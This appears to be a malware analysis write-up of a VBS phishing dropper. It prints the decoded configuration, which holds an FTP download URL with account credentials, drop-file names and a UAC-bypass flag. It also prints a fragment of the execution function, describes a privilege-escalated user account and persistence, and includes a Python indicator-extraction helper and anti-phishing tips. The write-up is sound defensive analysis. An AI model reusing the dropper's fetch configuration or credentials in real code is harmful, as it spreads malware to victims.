By Laura Cardillo and Átila Altoé: This is an analysis of a file converted to VBS, a phishing file received via e-mail by a third-party account. The focus of this report is not to explain in detail how the malware itself works, but rather to present a way to identify and decode the payload that disseminates it.
In this report we demonstrate how the analysis was performed on the VBS to identify and decode the malicious code and to trace the execution of this malware.
The Malware in Action
The extracted sample in question is shown below:
To begin the analysis, we opened the file in Notepad++ and noted the presence of a PowerShell command that decodes base64 strings. Unfortunately, the target content of this shortcut is too long for the file's Properties window. The string obtained is shown below:
As a string like this is not humanly readable, we decoded it with the CyberChef tool, which revealed the following function:
on error resume next
Dim winshell
Set winshell = WScript.CreateObject("WScript.Shell")
' Names of the files dropped during the infection
Timbalate = "setup.zip"
Timbalates = "setx.exe"
' FTP server and account used to fetch the payload
URL = "ftp://ftp.estamosainana.com/www/imagens.zip"
PACOTEUSER = "we areainana"
XANPUSER = "pQNPe6v^91TX"
Dim BaganeFold
' %AllUsersProfile% resolves to the all-users profile directory (C:\ProgramData on current Windows); used as the drop folder
BaganeFold = winshell.expandEnvironmentStrings("%AllUsersProfile%")
DestFolder = BaganeFold & "\SetX"
Dim objWMIService, processItems, processName
processName = "wscript.exe"
Dim jordi
' Full path of the running script
jordi = WScript.ScriptFullName
FORCE = "YES"
UACBYPASS = "NO"
From the beginning of the function, several points of attention stand out: the URL, user name and password of the account used in the attack, the fact that the attacker uses an FTP server to spread the malicious files, and the names of the files that will be used in the infection.
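Decoding the base64 string and pulling out the configuration values discussed above can be scripted rather than done by hand in CyberChef. The following Python helper is an added example, not code from the original report or from the sample; it runs on a constructed PowerShell one-liner whose URL, user and password are placeholders. It handles the UTF-16LE encoding that PowerShell's -EncodedCommand uses and the unterminated quotes seen in the extracted code.

```python
import base64
import re

# Constructed sample (not the real dropper): a PowerShell -EncodedCommand whose
# base64 payload decodes to a few lines in the style of the VBS configuration
# above. URL, user and password are placeholders.
INNER_VBS = (
    'URL = "ftp://ftp.example.invalid/www/payload.zip"\r\n'
    'PACOTEUSER = "ftpuser"\r\n'
    'XANPUSER = "placeholder-password"\r\n'
    'Timbalate = "setup.zip\r\n'   # unterminated quote, as in the extracted code
)
SAMPLE = ("powershell -NoP -W Hidden -EncodedCommand "
          + base64.b64encode(INNER_VBS.encode("utf-16le")).decode("ascii"))

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"\r\n]*)"?', re.M)
URL_RE = re.compile(r"^(?:ftp|https?)://", re.I)


def decode_blob(blob: str) -> str:
    """Decode one base64 blob. -EncodedCommand payloads are UTF-16LE, so ASCII
    text shows a zero byte after every character; detect that first, then
    fall back to UTF-8."""
    blob = blob.rstrip("=")
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16le")
    return raw.decode("utf-8", errors="replace")


def extract_indicators(script: str) -> dict:
    """Find base64 blobs in a script, decode them and collect the string
    assignments (URL, credentials, file names) that the dropper configures."""
    found = {}
    for blob in B64_RE.findall(script):
        for name, value in ASSIGN_RE.findall(decode_blob(blob)):
            found[name] = value
    return found


def network_iocs(indicators: dict) -> list:
    """Values that look like download locations, for blocking or hunting."""
    return sorted(v for v in indicators.values() if URL_RE.match(v))


if __name__ == "__main__":
    iocs = extract_indicators(SAMPLE)
    print(iocs)
    print(network_iocs(iocs))
```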
Further into the function, we also found an attempt to create a user ("Fisga"). This user was then put through a privilege-elevation process that raised its privileges, making it "root".
Finally, the malware also uses a specific expression at the end of the function to achieve the Persistence tactic (MITRE ATT&CK) and to force the user to accept "root" access, as shown below:
' Tail of the function: the opening If and the rotate/exec/execc routines are defined earlier in the script and are not shown here
        Else
            rotate
            exec
        End If
    ElseIf UACBYPASS = "YES" Then
        rotate
        execc
    Else
        rotate
        exec
    End If
End Function
Recommendations
The first important tip to keep in mind is that most reputable companies do not ask for personal information or account details by e-mail. This includes your bank, insurance companies, and any company with which you do business. If you receive an e-mail asking for any kind of account information, delete it immediately and call the company to confirm that your account is secure.
- Do not open attachments from suspicious or strange e-mails, especially Word, Excel, PowerPoint or PDF attachments.
- A useful phishing prevention tip is to always avoid clicking on links embedded in e-mails, because these may be loaded with malware.
- Another way to reduce your exposure to phishing messages is to use virus protection and anti-spam software.
Finally, it is critical to use a password manager to manage credentials, since malicious attackers will try the discovered credentials across the web. One of the best features of password managers is automatic filling of login forms, which minimizes clicks.
References
- Incoming file via honeypot and use of open-source tools.
- https://www.kaspersky.com.br/resource-center/preemptive-safety/phishing-prevention-tips